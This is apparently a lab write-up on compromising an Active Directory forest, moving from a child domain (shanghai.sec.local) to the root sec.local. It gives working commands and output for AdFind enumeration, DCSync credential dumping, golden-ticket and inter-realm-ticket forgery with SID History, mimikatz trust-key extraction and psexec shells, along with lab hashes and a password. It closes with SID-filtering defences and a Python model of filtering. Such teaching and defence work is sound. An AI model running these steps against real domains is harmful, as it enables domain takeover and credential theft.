Administrator
Published 2025-05-28

4.11 Domain forest penetration

Forest root domain: sec.local

Child domain: shanghai.sec.local (member host: Win2008R2)

Child domain: beijing.sec.local (member host: Win10)

I. Enumerating domain controllers

Current position: the Win2008R2 host in shanghai.sec.local. AdFind's -sc dclist lists the DCs of whichever domain is given as the search base:

C:\Users\sh_test\Desktop\AdFind>AdFind.exe -b dc=sec,dc=local -sc dclist
Win2019-DC1.sec.local

C:\Users\sh_test\Desktop\AdFind>AdFind.exe -b dc=shanghai,dc=sec,dc=local -sc dclist
shanghai-DC1.shanghai.sec.local

C:\Users\sh_test\Desktop\AdFind>AdFind.exe -b dc=beijing,dc=sec,dc=local -sc dclist
beijing-dc1.beijing.sec.local

C:\Users\sh_test\Desktop\AdFind>

II. Enumerating Domain Admins and Enterprise Admins

Enterprise Admins of the forest root (this group exists only in the root domain):

C:\Users\sh_test\Desktop\AdFind>AdFind.exe -b "CN=Enterprise Admins,CN=Users,DC=sec,DC=local" member

AdFind V01.62.00cpp Joe Richards (support@joeware.net) October 2023

Using server: shanghai-DC1.shanghai.sec.local:389
Directory: Windows Server 2019

dn:CN=Enterprise Admins,CN=Users,DC=sec,DC=local
>member: CN=Administrator,CN=Users,DC=sec,DC=local

1 Objects returned

C:\Users\sh_test\Desktop\AdFind>

Domain Admins of the forest root:

C:\Users\sh_test\Desktop\AdFind>AdFind.exe -b "CN=Domain Admins,CN=Users,DC=sec,DC=local" member

AdFind V01.62.00cpp Joe Richards (support@joeware.net) October 2023

Using server: shanghai-DC1.shanghai.sec.local:389
Directory: Windows Server 2019

dn:CN=Domain Admins,CN=Users,DC=sec,DC=local
>member: CN=Administrator,CN=Users,DC=sec,DC=local

1 Objects returned

C:\Users\sh_test\Desktop\AdFind>

Domain Admins of beijing.sec.local:

C:\Users\sh_test\Desktop\AdFind>AdFind.exe -b "CN=Domain Admins,CN=Users,DC=beijing,DC=sec,DC=local" member

AdFind V01.62.00cpp Joe Richards (support@joeware.net) October 2023

Using server: shanghai-DC1.shanghai.sec.local:389
Directory: Windows Server 2019

dn:CN=Domain Admins,CN=Users,DC=beijing,DC=sec,DC=local
>member: CN=bj_admin,CN=Users,DC=beijing,DC=sec,DC=local
>member: CN=Administrator,CN=Users,DC=beijing,DC=sec,DC=local

1 Objects returned

C:\Users\sh_test\Desktop\AdFind>

Domain Admins of shanghai.sec.local:

C:\Users\sh_test\Desktop\AdFind>AdFind.exe -b "CN=Domain Admins,CN=Users,DC=shanghai,DC=sec,DC=local" member

AdFind V01.62.00cpp Joe Richards (support@joeware.net) October 2023

Using server: shanghai-DC1.shanghai.sec.local:389
Directory: Windows Server 2019

dn:CN=Domain Admins,CN=Users,DC=shanghai,DC=sec,DC=local
>member: CN=sh_admin,CN=Users,DC=shanghai,DC=sec,DC=local
>member: CN=Administrator,CN=Users,DC=shanghai,DC=sec,DC=local

1 Objects returned

C:\Users\sh_test\Desktop\AdFind>

III. Enumerating all domain users

C:\Users\sh_test\Desktop\AdFind>net group "domain users" /domain
The request will be processed at a domain controller for domain shanghai.sec.local.

Group name     Domain Users
Comment        All domain users

Members

-------------------------------------------------------------------------------
Administrator            krbtgt                   SEC$
sh_admin                 sh_test
The command completed successfully.

C:\Users\sh_test\Desktop\AdFind>

With AdFind (net group only answers for the current domain; an LDAP query can be pointed at any domain in the forest):

Under sec.local:

C:\Users\sh_test\Desktop\AdFind>AdFind.exe -b dc=sec,dc=local -f "(&(objectCategory=person)(objectClass=user))" -dn

AdFind V01.62.00cpp Joe Richards (support@joeware.net) October 2023

Using server: shanghai-DC1.shanghai.sec.local:389
Directory: Windows Server 2019

dn:CN=Administrator,CN=Users,DC=sec,DC=local
dn:CN=Guest,CN=Users,DC=sec,DC=local
dn:CN=krbtgt,CN=Users,DC=sec,DC=local
dn:CN=hack,CN=Users,DC=sec,DC=local
dn:CN=test1,CN=Users,DC=sec,DC=local
dn:CN=Exchange Online-ApplicationAccount,CN=Users,DC=sec,DC=local
.............

28 Objects returned

C:\Users\sh_test\Desktop\AdFind>

Under beijing.sec.local:

C:\Users\sh_test\Desktop\AdFind>AdFind.exe -b dc=beijing,dc=sec,dc=local -f "(&(objectCategory=person)(objectClass=user))" -dn

AdFind V01.62.00cpp Joe Richards (support@joeware.net) October 2023

Using server: shanghai-DC1.shanghai.sec.local:389
Directory: Windows Server 2019

dn:CN=Administrator,CN=Users,DC=beijing,DC=sec,DC=local
dn:CN=Guest,CN=Users,DC=beijing,DC=sec,DC=local
dn:CN=krbtgt,CN=Users,DC=beijing,DC=sec,DC=local
dn:CN=SEC$,CN=Users,DC=beijing,DC=sec,DC=local
dn:CN=bj_test,CN=Users,DC=beijing,DC=sec,DC=local
dn:CN=bj_admin,CN=Users,DC=beijing,DC=sec,DC=local

6 Objects returned

C:\Users\sh_test\Desktop\AdFind>

IV. Enumerating all domain computers

C:\Users\sh_test\Desktop\AdFind>net group "domain computers" /domain
The request will be processed at a domain controller for domain shanghai.sec.local.

Group name     Domain Computers
Comment        All workstations and servers joined to the domain

Members

-------------------------------------------------------------------------------
WIN-LTDJEMOOIVH$
The command completed successfully.

C:\Users\sh_test\Desktop\AdFind>

Computers under sec.local:

C:\Users\sh_test\Desktop\AdFind>AdFind.exe -b dc=sec,dc=local -f "objectcategory=computer" dn

AdFind V01.62.00cpp Joe Richards (support@joeware.net) October 2023

Using server: shanghai-DC1.shanghai.sec.local:389
Directory: Windows Server 2019

dn:CN=WIN2019-DC1,OU=Domain Controllers,DC=sec,DC=local

dn:CN=WIN2008-1,CN=Computers,DC=sec,DC=local

dn:CN=machine1,CN=Computers,DC=sec,DC=local

dn:CN=machine2,CN=Computers,DC=sec,DC=local

dn:CN=WIN10-1,CN=Computers,DC=sec,DC=local

dn:CN=EXCHANGE,CN=Computers,DC=sec,DC=local

6 Objects returned

C:\Users\sh_test\Desktop\AdFind>

Computers under beijing.sec.local:

C:\Users\sh_test\Desktop\AdFind>AdFind.exe -b dc=beijing,dc=sec,dc=local -f "objectcategory=computer" dn

AdFind V01.62.00cpp Joe Richards (support@joeware.net) October 2023

Using server: shanghai-DC1.shanghai.sec.local:389
Directory: Windows Server 2019

dn:CN=BEIJING-DC1,OU=Domain Controllers,DC=beijing,DC=sec,DC=local

dn:CN=WIN-422PJ6KIL95,CN=Computers,DC=beijing,DC=sec,DC=local

2 Objects returned

C:\Users\sh_test\Desktop\AdFind>

V. Cross-domain lateral movement

1. Obtaining child-domain privileges

Assume the Domain Admin account sh_admin of shanghai.sec.local has already been compromised.

DCSync the child domain's krbtgt (shanghai\krbtgt):

(base) ┌──(root㉿Kali)-[~]
└─# secretsdump.py shanghai/sh_admin:"Az123456@sh"@10.10.4.3 -just-dc-user "shanghai\krbtgt"
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:622be976ac1f019594ef183a62f0a08b:::
[*] Kerberos keys grabbed
krbtgt:aes256-cts-hmac-sha1-96:db5f379620458a216d0db1293901047e5d975463553303295a989087dbc18ff5
krbtgt:aes128-cts-hmac-sha1-96:4dbdd01957f0c20b7b190f797a5d7672
krbtgt:des-cbc-md5:b523a46bbaf107ef
[*] Cleaning up...

(base) ┌──(root㉿Kali)-[~]
└─#

Note: a child-domain administrator has no right to DCSync the forest root or the other child domain; from this position only the child's own secrets, including its krbtgt, can be dumped directly.

2. Golden ticket + SID History to obtain forest-root privileges

First obtain the domain SID of the current domain shanghai.sec.local and the SID of the Enterprise Admins group in the forest root sec.local.

# Domain SID of the current domain shanghai.sec.local
(base) ┌──(root㉿Kali)-[~]
└─# lookupsid.py shanghai/sh_admin:"Az123456@sh"@10.10.4.3|grep "Domain SID is"
[*] Domain SID is: S-1-5-21-706492745-1437521578-640732945

# SID of Enterprise Admins in the forest root sec.local
└─# lookupsid.py shanghai/sh_admin:"Az123456@sh"@10.10.4.2
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

[*] Brute forcing SIDs at 10.10.4.2
[*] StringBinding ncacn_np:10.10.4.2[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-2066713137-2133816201-3751750268
519: SEC\Enterprise Admins (SidTypeGroup)

Domain SID of shanghai.sec.local: S-1-5-21-706492745-1437521578-640732945

SID of Enterprise Admins in the forest root sec.local: S-1-5-21-2066713137-2133816201-3751750268-519

Carry out the golden ticket + SID History attack (here with Impacket's ticketer.py rather than mimikatz; the mimikatz equivalent is kerberos::golden with /sids):

Forge a golden ticket for shanghai.sec.local, signed with the child krbtgt key, that carries a forest-root group SID in ExtraSids (SID History):

(base) ┌──(root㉿Kali)-[~]
└─# ticketer.py -aesKey "4dbdd01957f0c20b7b190f797a5d7672" -domain-sid S-1-5-21-706492745-1437521578-640732945 -domain shanghai.sec.local -extra-sid 'S-1-5-21-2066713137-2133816201-3751750268-512' -user-id 500 administrator
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] Creating basic skeleton ticket and PAC Infos
/root/miniconda3/bin/ticketer.py:141: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
  aTime = timegm(datetime.datetime.utcnow().timetuple())
[*] Customizing ticket for shanghai.sec.local/administrator
/root/miniconda3/bin/ticketer.py:600: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
  ticketDuration = datetime.datetime.utcnow() + datetime.timedelta(hours=int(self.__options.duration))
/root/miniconda3/bin/ticketer.py:718: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
  encTicketPart['authtime'] = KerberosTime.to_asn1(datetime.datetime.utcnow())
/root/miniconda3/bin/ticketer.py:719: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
  encTicketPart['starttime'] = KerberosTime.to_asn1(datetime.datetime.utcnow())
[*]     PAC_LOGON_INFO
[*]     PAC_CLIENT_INFO_TYPE
[*]     EncTicketPart
/root/miniconda3/bin/ticketer.py:843: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
  encRepPart['last-req'][0]['lr-value'] = KerberosTime.to_asn1(datetime.datetime.utcnow())
[*]     EncAsRepPart
[*] Signing/Encrypting final ticket
[*]     PAC_SERVER_CHECKSUM
[*]     PAC_PRIVSVR_CHECKSUM
[*]     EncTicketPart
[*]     EncASRepPart
[*] Saving ticket in administrator.ccache

(base) ┌──(root㉿Kali)-[~]
└─# export KRB5CCNAME=administrator.ccache

Test with psexec. Two things to note about the ticket just forged: its -extra-sid injects RID 512 (Domain Admins of sec.local) rather than the Enterprise Admins RID 519 resolved above; either group grants administrative access to the forest root. And the target below is SHANGHAI-DC1, which sh_admin already controlled, so the run only shows that the ticket is accepted; to demonstrate forest-root access, point the same ticket at Win2019-DC1.sec.local (as the inter-realm-key variant below does with secretsdump).

(base) ┌──(root㉿Kali)-[~]
└─# psexec.py -k -no-pass SHANGHAI-DC1.shanghai.sec.local
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] Requesting shares on SHANGHAI-DC1.shanghai.sec.local.....
[*] Found writable share ADMIN$
[*] Uploading file megpbhhH.exe
[*] Opening SVCManager on SHANGHAI-DC1.shanghai.sec.local.....
[*] Creating service bLgS on SHANGHAI-DC1.shanghai.sec.local.....
[*] Starting service bLgS.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.6893]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>

Note: the enforcement phase of KB5008380 (CVE-2021-42287, which adds the PAC_REQUESTOR and PAC_ATTRIBUTES buffers to the PAC) began with the October 2022 updates. Forged tickets must therefore carry the new PAC buffers: the 2020 mimikatz release build and Impacket 0.9.x (the version used for the DCSync above) are too old to produce them, which is why ticketer.py from Impacket 0.12.0 is used here. In this lab the ticket was only accepted when signed with the krbtgt AES key; the NT hash (RC4) was rejected. -user-id must also be given so that PAC_REQUESTOR matches the RID of the impersonated account (500 for Administrator).

3. Inter-realm key + SID History to obtain forest-root privileges

On the shanghai DC, dump the inter-realm (trust) keys with mimikatz:

mimikatz # lsadump::trust /patch

Current domain: SHANGHAI.SEC.LOCAL (SHANGHAI / S-1-5-21-706492745-1437521578-640732945)

Domain: SEC.LOCAL (SEC / S-1-5-21-2066713137-2133816201-3751750268)
 [  In ] SHANGHAI.SEC.LOCAL -> SEC.LOCAL
    * 6/1/2025 7:19:25 PM - CLEAR   - 09 a5 38 a2 f7 b1 76 69 6d 26 9b ad 56 f0 bd 94 92 9c 2f 3e 43 d7 53 c5 2b 84 a5 07 8f 21 7f 5b 19 86 48 8c b5 72 29 48 53 24 8c e1 dd 38 66 0a e8 84 90 05 e6 f8 eb 50 10 7b 03 55 58 3d a4 31 4b 09 86 da 10 a5 2c 06 0f 7f a0 e0 fa ee 58 4f fe 43 16 ce 9f 04 a3 db 8b 48 45 39 c0 16 75 2c f1 b0 d8 3f ad a6 a0 3f 76 29 25 ef d2 02 22 48 a9 4d 5c 29 47 b1 55 49 8c 68 b8 17 0d 58 c1 c6 eb 68 61 7c ee fc 81 5a c1 0c 9f a1 b0 c4 49 b7 75 5d 13 13 3c 5d de 25 f2 2d 0d 93 b3 3a f3 c7 c6 4c 07 05 c0 bb 48 67 98 0f 5c 80 46 a9 f4 32 29 12 04 aa f1 a4 93 69 0e cd 67 c9 f4 44 49 3f b0 8b 03 3c 03 ea 56 7f f8 39 6b 57 a3 05 89 c8 00 75 d8 7b 02 c1 f1 94 22 4e 63 35 cd 71 cc 97 11 23 cc b8 89 4e 5f bd 6f 9f c1 60 b9 90 ab 05 ca 6c 9e 46 a5 87 d9 b7 44 c4 f6 52 2e 36 a8 7c
        * aes256_hmac       c8723eb8abcc5e741eef13ff4debb20e3a31a65739adf73fd37b452945e56b84
        * aes128_hmac       fe46f3616bfa9eac1c1acd3f495a82b2
        * rc4_hmac_nt       5a5bd4682d0de698802e36cc963f9cc6

 [ Out ] SEC.LOCAL -> SHANGHAI.SEC.LOCAL
    * 6/1/2025 7:19:25 PM - CLEAR   - 09 a5 38 a2 f7 b1 76 69 6d 26 9b ad 56 f0 bd 94 92 9c 2f 3e 43 d7 53 c5 2b 84 a5 07 8f 21 7f 5b 19 86 48 8c b5 72 29 48 53 24 8c e1 dd 38 66 0a e8 84 90 05 e6 f8 eb 50 10 7b 03 55 58 3d a4 31 4b 09 86 da 10 a5 2c 06 0f 7f a0 e0 fa ee 58 4f fe 43 16 ce 9f 04 a3 db 8b 48 45 39 c0 16 75 2c f1 b0 d8 3f ad a6 a0 3f 76 29 25 ef d2 02 22 48 a9 4d 5c 29 47 b1 55 49 8c 68 b8 17 0d 58 c1 c6 eb 68 61 7c ee fc 81 5a c1 0c 9f a1 b0 c4 49 b7 75 5d 13 13 3c 5d de 25 f2 2d 0d 93 b3 3a f3 c7 c6 4c 07 05 c0 bb 48 67 98 0f 5c 80 46 a9 f4 32 29 12 04 aa f1 a4 93 69 0e cd 67 c9 f4 44 49 3f b0 8b 03 3c 03 ea 56 7f f8 39 6b 57 a3 05 89 c8 00 75 d8 7b 02 c1 f1 94 22 4e 63 35 cd 71 cc 97 11 23 cc b8 89 4e 5f bd 6f 9f c1 60 b9 90 ab 05 ca 6c 9e 46 a5 87 d9 b7 44 c4 f6 52 2e 36 a8 7c
        * aes256_hmac       b04f8d79073c9d0fbd316a92f12ec5ec73b0dc4e1cb514b6fb7a5a7300cc79e5
        * aes128_hmac       977748d2c64dde47348251c7d0bf2c29
        * rc4_hmac_nt       5a5bd4682d0de698802e36cc963f9cc6

The rc4_hmac_nt key is 5a5bd4682d0de698802e36cc963f9cc6. It is the NT hash of the trust password, so it is identical in both directions, whereas the AES keys are salted per direction and differ.

Domain SID of shanghai.sec.local: S-1-5-21-706492745-1437521578-640732945

SID of Enterprise Admins in the forest root sec.local: S-1-5-21-2066713137-2133816201-3751750268-519

# Forge the inter-realm TGT (referral ticket) for krbtgt/sec.local with the trust key, carrying the Enterprise Admins SID as an extra SID
(base) ┌──(root㉿Kali)-[~]
└─# ticketer.py -nthash "5a5bd4682d0de698802e36cc963f9cc6" -domain-sid "S-1-5-21-706492745-1437521578-640732945" -domain "shanghai.sec.local" -extra-sid "S-1-5-21-2066713137-2133816201-3751750268-519" -spn "krbtgt/sec.local" "administrator"
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] Creating basic skeleton ticket and PAC Infos
/root/miniconda3/bin/ticketer.py:141: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
  aTime = timegm(datetime.datetime.utcnow().timetuple())
[*] Customizing ticket for shanghai.sec.local/administrator
[*]     PAC_LOGON_INFO
[*]     PAC_CLIENT_INFO_TYPE
[*]     EncTicketPart
/root/miniconda3/bin/ticketer.py:843: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
  encRepPart['last-req'][0]['lr-value'] = KerberosTime.to_asn1(datetime.datetime.utcnow())
[*]     EncTGSRepPart
[*] Signing/Encrypting final ticket
[*]     PAC_SERVER_CHECKSUM
[*]     PAC_PRIVSVR_CHECKSUM
[*]     EncTicketPart
[*]     EncTGSRepPart
[*] Saving ticket in administrator.ccache

# Import the ticket. It must be exported: a bare KRB5CCNAME=... assignment is visible only to the shell itself, not to the Impacket scripts (the export of the same file name in step 2 is what made this work as originally typed)
(base) ┌──(root㉿Kali)-[~]
└─# export KRB5CCNAME=administrator.ccache

# Use the referral ticket to obtain a CIFS service ticket for the forest-root DC
(base) ┌──(root㉿Kali)-[~]
└─# getST.py -dc-ip 10.10.4.2 sec.local/administrator -spn CIFS/Win2019-DC1.sec.local -k -no-pass
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] Getting ST for user
[*] Saving ticket in administrator@CIFS_Win2019-DC1.sec.local@SEC.LOCAL.ccache

# DCSync the forest root's krbtgt (KRB5CCNAME still points at the referral ticket; secretsdump requests the service tickets it needs)
(base) ┌──(root㉿Kali)-[~]
└─# secretsdump.py -no-pass -k shanghai.sec.local/administrator@Win2019-DC1.sec.local -just-dc-user "sec\krbtgt"
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:1258230d20deb8fa8c0ee72e014ae813:::
[*] Kerberos keys grabbed
krbtgt:aes256-cts-hmac-sha1-96:f17ecd5329b2b676b5737a7e40c5cd26337048e048b09663ceef99178afff9d8
krbtgt:aes128-cts-hmac-sha1-96:48387c994c399862ae5ef5a7c86f0c8e
krbtgt:des-cbc-md5:512a436789e32394
[*] Cleaning up...

VI. Defending against forest attacks

1. SID filtering

SID filter quarantining is off by default on trusts inside a forest, which is why the parent accepted the SIDs the child's KDC placed in the PAC above. It can be turned on for the trust from the trusting domain (sec.local, the positional argument) to the trusted child (shanghai.sec.local, /d:), run with Enterprise Admin rights:

netdom trust sec.local /d:shanghai.sec.local /quarantine:yes

Microsoft does not recommend quarantining trusts inside a forest (it interferes with normal forest operation), and it does not change the underlying fact: the forest, not the domain, is the security boundary, and a child's krbtgt or trust key is enough to reach the root. Treat every domain controller and every krbtgt account in the forest as Tier 0, and put units that must be isolated from each other into separate forests joined by a forest trust, where SID filtering is applied by default.

2. Disabling SID History on forest trusts

netdom's /EnableSIDHistory switch applies only to outbound forest trusts; it is not a control for the parent-child trust attacked above, and it is already "no" when a forest trust is created. Keep it that way unless a migration genuinely needs SID History across the trust, and turn it back off afterwards (run in the trusting forest's root domain; <other forest root> stands for the trusted forest's root domain):

netdom trust sec.local /d:<other forest root> /EnableSIDHistory:no
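To see what the two settings above actually change, here is an added Python model (not from the original post) of the SID filtering a trusting domain applies to the SIDs carried in a ticket received over a trust, using the trustAttributes bit values from MS-ADTS. It is a simplification: it covers only domain SIDs (S-1-5-21-...), ignores the always-filtered well-known SIDs, and models a SID-History-enabled forest trust (TREAT_AS_EXTERNAL) as "foreign domain SIDs pass only with RID >= 1000", the behaviour generally described for that flag; MS-PAC section 4.1.2.2 has the complete table. The Trust class, the scenario constants and the hypothetical forest-trust scenarios (shanghai treated as if it were its own forest) are this example's own.

```python
"""Added example (not from the original post): a simplified model of the SID
filtering a trusting domain applies to ExtraSids / SID History in a ticket
received over a trust. Simplifications are noted inline."""
from dataclasses import dataclass

# trustAttributes bits (MS-ADTS, attribute trustAttributes)
TRUST_ATTRIBUTE_QUARANTINED_DOMAIN = 0x00000004   # set by netdom /quarantine:yes
TRUST_ATTRIBUTE_FOREST_TRANSITIVE = 0x00000008
TRUST_ATTRIBUTE_WITHIN_FOREST = 0x00000020        # parent-child / tree-root trusts
TRUST_ATTRIBUTE_TREAT_AS_EXTERNAL = 0x00000040    # set by netdom /EnableSIDHistory:yes

# Domain SIDs from the post
SHANGHAI_SID = "S-1-5-21-706492745-1437521578-640732945"
SEC_SID = "S-1-5-21-2066713137-2133816201-3751750268"


@dataclass(frozen=True)
class Trust:
    trusting: str              # domain evaluating the incoming ticket
    trusted: str               # domain whose KDC / trust key issued it
    trusted_sid: str           # domain SID of `trusted`
    attributes: int            # trustAttributes bit mask
    forest_sids: tuple = ()    # all domain SIDs of the trusted forest (forest trusts)

    def trusted_domains(self):
        return set(self.forest_sids) | {self.trusted_sid}


def _split_domain_sid(sid):
    """('S-1-5-21-A-B-C', rid) for an account/group SID, (None, None) otherwise."""
    parts = sid.split("-")
    if parts[:4] != ["S", "1", "5", "21"] or len(parts) != 8:
        return None, None
    return "-".join(parts[:7]), int(parts[7])


def filter_sids(trust, sids):
    """Return (kept, dropped) for the domain SIDs presented over `trust`.

    Intra-forest, default:  nothing is filtered; any SID the child's krbtgt
                            signs into a PAC is honoured by the parent.
    Quarantined:            only SIDs relative to the trusted domain survive.
    Forest trust:           only SIDs from the trusted forest's domains survive.
    Forest trust + SID History (TREAT_AS_EXTERNAL): foreign SIDs pass when
                            RID >= 1000; RID < 1000 (500/512/519 ...) is dropped.
                            (Simplified from MS-PAC 4.1.2.2.)
    Non-domain SIDs are passed through; the always-filtered list is out of scope.
    """
    kept, dropped = [], []
    for sid in sids:
        domain, rid = _split_domain_sid(sid)
        if domain is None:
            kept.append(sid)
            continue
        if trust.attributes & TRUST_ATTRIBUTE_QUARANTINED_DOMAIN:
            ok = domain == trust.trusted_sid
        elif trust.attributes & TRUST_ATTRIBUTE_WITHIN_FOREST:
            ok = True
        elif trust.attributes & TRUST_ATTRIBUTE_TREAT_AS_EXTERNAL:
            ok = domain in trust.trusted_domains() or rid >= 1000
        else:
            ok = domain in trust.trusted_domains()
        (kept if ok else dropped).append(sid)
    return kept, dropped


# What the forged PAC from section 2 carries: the child's Administrator plus
# the forest root's Enterprise Admins via SID History.
FORGED_SIDS = [f"{SHANGHAI_SID}-500", f"{SEC_SID}-519"]

# sec.local <- shanghai.sec.local as it exists in the lab (no filtering)
PARENT_CHILD = Trust("sec.local", "shanghai.sec.local", SHANGHAI_SID,
                     TRUST_ATTRIBUTE_WITHIN_FOREST)
# the same trust after: netdom trust sec.local /d:shanghai.sec.local /quarantine:yes
PARENT_CHILD_QUARANTINED = Trust("sec.local", "shanghai.sec.local", SHANGHAI_SID,
                                 TRUST_ATTRIBUTE_WITHIN_FOREST | TRUST_ATTRIBUTE_QUARANTINED_DOMAIN)
# hypothetical: shanghai as a separate forest joined to sec.local by a forest trust
FOREST_TRUST = Trust("sec.local", "shanghai.sec.local", SHANGHAI_SID,
                     TRUST_ATTRIBUTE_FOREST_TRANSITIVE, (SHANGHAI_SID,))
FOREST_TRUST_SID_HISTORY = Trust("sec.local", "shanghai.sec.local", SHANGHAI_SID,
                                 TRUST_ATTRIBUTE_FOREST_TRANSITIVE | TRUST_ATTRIBUTE_TREAT_AS_EXTERNAL,
                                 (SHANGHAI_SID,))

if __name__ == "__main__":
    scenarios = [("parent-child (default)", PARENT_CHILD),
                 ("parent-child, quarantined", PARENT_CHILD_QUARANTINED),
                 ("forest trust", FOREST_TRUST),
                 ("forest trust, SID History enabled", FOREST_TRUST_SID_HISTORY)]
    for name, trust in scenarios:
        kept, dropped = filter_sids(trust, FORGED_SIDS + [f"{SEC_SID}-1105"])
        print(f"{name:36} kept={kept} dropped={dropped}")
```

The parent-child scenario is the lab as built: the forged ...-519 passes untouched. With quarantine it is dropped, and on a forest trust it is dropped whether or not SID History is enabled, which is why cross-forest SID History abuse targets groups with RID >= 1000 rather than Enterprise Admins.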
